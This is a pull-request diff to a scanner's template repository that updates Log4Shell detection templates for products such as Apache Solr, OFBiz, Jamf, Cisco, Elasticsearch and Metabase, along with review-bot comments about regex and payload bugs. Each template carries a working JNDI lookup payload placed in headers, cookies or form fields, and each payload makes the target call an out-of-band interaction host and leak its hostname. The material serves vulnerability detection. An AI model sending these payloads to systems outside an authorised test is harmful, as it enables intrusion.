Merge pull request #7170 from projectdiscovery/update-log4j

Update All Existing Log4j Templates
patch-1
Ritik Chaddha 2023-05-11 13:13:19 +05:30 committed by GitHub
commit 9082cb7329
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
25 changed files with 399 additions and 127 deletions


@ -1,51 +1,55 @@
file/keys/postman-api-key.yaml
headless/technologies/sap-spartacus.yaml
http/cves/2017/CVE-2017-17731.yaml
http/cves/2020/CVE-2020-27481.yaml
http/cves/2021/CVE-2021-27314.yaml
http/cves/2021/CVE-2021-27315.yaml
http/cves/2021/CVE-2021-27316.yaml
http/cves/2021/CVE-2021-27319.yaml
http/cves/2021/CVE-2021-27320.yaml
http/cves/2021/CVE-2021-30175.yaml
http/cves/2021/CVE-2021-44228.yaml
http/cves/2022/CVE-2022-24264.yaml
http/cves/2022/CVE-2022-24265.yaml
http/cves/2022/CVE-2022-24266.yaml
http/cves/2022/CVE-2022-24716.yaml
http/cves/2022/CVE-2022-27984.yaml
http/cves/2022/CVE-2022-27985.yaml
http/cves/2022/CVE-2022-3980.yaml
http/cves/2022/CVE-2022-42095.yaml
http/cves/2022/CVE-2022-42096.yaml
http/cves/2022/CVE-2022-4328.yaml
http/cves/2022/CVE-2022-45037.yaml
http/cves/2022/CVE-2022-45038.yaml
http/cves/2022/CVE-2022-46020.yaml
http/cves/2023/CVE-2023-1020.yaml
http/cves/2023/CVE-2023-1671.yaml
http/cves/2023/CVE-2023-20864.yaml
http/cves/2023/CVE-2023-25135.yaml
http/cves/2023/CVE-2023-26360.yaml
http/cves/2023/CVE-2023-27350.yaml
http/cves/2023/CVE-2023-27524.yaml
http/cves/2023/CVE-2023-29489.yaml
http/cves/2023/CVE-2023-29922.yaml
http/cves/2023/CVE-2023-30210.yaml
http/cves/2023/CVE-2023-30212.yaml
http/cves/2023/CVE-2023-31059.yaml
http/cves/2023/CVE-2023-32235.yaml
http/default-logins/powerjob-default-login.yaml
http/default-logins/umami/umami-default-login.yaml
http/exposed-panels/oracle-opera-login.yaml
http/exposed-panels/papercut-ng-panel.yaml
http/exposed-panels/proxmox-panel.yaml
http/exposed-panels/red-lion-panel.yaml
http/exposed-panels/sophos-web-appliance.yaml
http/exposures/tokens/postman/postman-key.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
http/osint/mail-archive.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml
cves/2017/CVE-2017-16894.yaml
cves/2020/CVE-2020-10199.yaml
cves/2021/CVE-2021-25078.yaml
cves/2021/CVE-2021-35250.yaml
cves/2022/CVE-2022-0747.yaml
cves/2022/CVE-2022-0769.yaml
cves/2022/CVE-2022-0773.yaml
cves/2022/CVE-2022-0846.yaml
cves/2022/CVE-2022-0864.yaml
cves/2022/CVE-2022-1903.yaml
cves/2022/CVE-2022-2219.yaml
cves/2022/CVE-2022-24223.yaml
cves/2022/CVE-2022-25485.yaml
cves/2022/CVE-2022-25486.yaml
cves/2022/CVE-2022-25487.yaml
cves/2022/CVE-2022-25488.yaml
cves/2022/CVE-2022-25489.yaml
cves/2022/CVE-2022-25497.yaml
cves/2022/CVE-2022-27926.yaml
cves/2022/CVE-2022-28032.yaml
cves/2022/CVE-2022-3062.yaml
cves/2022/CVE-2022-37190.yaml
cves/2022/CVE-2022-37191.yaml
cves/2022/CVE-2022-38295.yaml
cves/2022/CVE-2022-38296.yaml
cves/2022/CVE-2022-38467.yaml
cves/2022/CVE-2022-41441.yaml
cves/2022/CVE-2022-42094.yaml
cves/2022/CVE-2022-4321.yaml
cves/2023/CVE-2023-0099.yaml
cves/2023/CVE-2023-22620.yaml
cves/2023/CVE-2023-22897.yaml
cves/2023/CVE-2023-27008.yaml
cves/2023/CVE-2023-27159.yaml
cves/2023/CVE-2023-27179.yaml
cves/2023/CVE-2023-29084.yaml
default-logins/trassir/trassir-default-login.yaml
exposed-panels/appwrite-panel.yaml
exposed-panels/aspect-control-panel.yaml
exposures/logs/yii-error-page.yaml
misconfiguration/apollo-adminservice-unauth.yaml
misconfiguration/default-spx-key.yaml
misconfiguration/sql-server-report-viewer.yaml
misconfiguration/thinkphp-errors.yaml
network/detection/msmq-detect.yaml
network/enumeration/beanstalk-service.yaml
osint/hashnode.yaml
osint/imgbb.yaml
osint/rubygems.yaml
technologies/default-apache-shiro.yaml
technologies/switch-protocol.yaml
vulnerabilities/generic/cache-poisoning-xss.yaml
vulnerabilities/huawei/huawei-firewall-lfi.yaml
vulnerabilities/others/universal-media-xss.yaml
vulnerabilities/wordpress/ldap-wp-login-xss.yaml


@ -55,19 +55,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28
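Review bot: The comment on the new `group: 1` extractor says it prints `${:-{{rand1}}}${:-{{rand2}}}.${hostName}`, but `\d{6}\.` sits outside the first capture group, so only the hostname part is extracted; the same "Print extracted …" text is also attached to the matcher regex, which matches rather than prints. I would word the matcher comment `# Match <6-digit marker>.<hostName>.<injection point>.<interaction host>` and keep `# Print extracted ${hostName} in output` on the extractor. The same two comments recur in every template section of this commit. The `http:` block these hunks belong to starts and ends outside the visible lines.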


@ -22,12 +22,16 @@ info:
shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27
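Review bot: The new matcher and both extractors hard-code the shape of the callback name: after the injection-point label they expect exactly `([a-z0-9]+)\.([a-z0-9]+)\.\w+`, which fits an interaction host of the form `<id>.<domain>.<tld>` (inferred from the regex; the value of `{{interactsh-url}}` is not visible here). With a self-hosted interaction server on a deeper domain, the greedy first group would presumably absorb the `cookie` label and `group: 2` would report the correlation id as the injection point. The hostname class `[a-zA-Z0-9\.\-]+` also excludes `_`, so a host whose name contains an underscore would likely fail the `and` matcher and the finding would be dropped. A comment such as `# assumes {{interactsh-url}} is <id>.<domain>.<tld>` would record the assumption, and the same regex is used in the other sections of this commit.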


@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
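Review bot: The new request line carries a stray literal `}` after `{{rand2}}` (`%24%7B%3A-{{rand2}}}%7D`), so the decoded parameter contains `${:-<rand2>}}` and the extra brace appears to close the outer lookup before `.${hostName}.uri.` is reached. If that is what happens, the callback name never carries the hostname or the `uri` label, the `\d{6}\.…` matcher cannot match, and a vulnerable instance would be reported as clean. The segment should read `%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}`, matching the Elasticsearch template in this commit, which has `{{rand2}}%7D` with no extra brace.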


@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -41,21 +45,31 @@ http:
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27


@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 10s
POST /suite-auth/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -55,10 +59,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -54,10 +58,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023


@ -24,10 +24,14 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27


@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -48,13 +52,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -23,6 +23,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
@ -47,13 +51,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -21,10 +21,14 @@ info:
verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}}
{
@ -44,17 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true
matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: regex
@ -61,10 +65,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10
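Review bot: The rewritten POST body still sends `formPanel%3AloginGrid%3Avalue={{view}}}` with three closing braces, so a literal `}` is appended to the extracted view value; this is carried over unchanged from the old line and looks like a typo rather than intent. Since the line is being touched anyway, it could read `formPanel%3AloginGrid%3Avalue={{view}}&formPanel%3AloginGrid%3AloginButton=…`. Whether the server tolerates the extra character is not visible from this hunk, so the template should be re-verified after the change.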


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and
matchers:
@ -44,7 +48,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -56,10 +60,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -20,10 +20,14 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
